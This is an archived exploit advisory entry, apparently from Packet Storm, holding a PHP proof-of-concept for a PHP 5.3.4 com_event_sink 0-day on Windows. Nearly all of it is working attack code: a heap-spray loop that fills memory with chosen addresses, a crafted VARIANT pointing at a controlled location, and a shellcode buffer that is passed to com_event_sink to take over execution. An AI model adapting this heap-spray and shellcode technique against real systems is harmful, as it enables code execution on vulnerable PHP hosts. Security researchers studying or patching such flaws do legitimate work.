PHP 5.3.4 com_event_sink 0-Day

2012-10-09T00:00:00
ID PACKETSTORM:117245
Type packetstorm
Reporter FB1H2S
Modified 2012-10-09T00:00:00

Description

                                        
                                            `  
  
<?php  
//PHP 5.3.4   
  
//  
//$eip ="\x44\x43\x42\x41";  
$eip= "\x4b\xe8\x57\x78";  
$eax ="\x80\x01\x8d\x04";  
$deodrant="";  
$axespray = str_repeat($eip.$eax,0x80);  
  
//048d0190  
echo strlen($axespray);  
echo "PHP 5.3.4 WIN Com Module COM_SINK 0-day\n" ;  
echo "By Rahul Sasi : http://twitter.com/fb1h2s\n" ;  
echo "Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n" ;  
echo "More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n" ;  
  
  
//19200 ==4B32 4b00  
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++)  
{  
$deodrant.=$axespray;  
}  
  
  
$terminate = "T";  
  
$u[] =$deodrant;  
  
$r[] =$deodrant.$terminate;  
$a[] =$deodrant.$terminate;  
$s[] =$deodrant.$terminate;  
  
  
//$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll  
$vVar = new VARIANT(0x048d0000+180);   
//alert box Shellcode   
$buffer = "\x90\x90\x90".  
"\xB9\x38\xDD\x82\x7C\x33\xC0\xBB".  
"\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";  
  
$var2 = new VARIANT(0x41414242);  
  
com_event_sink($vVar,$var2,$buffer);  
  
  
  
  
?>  
`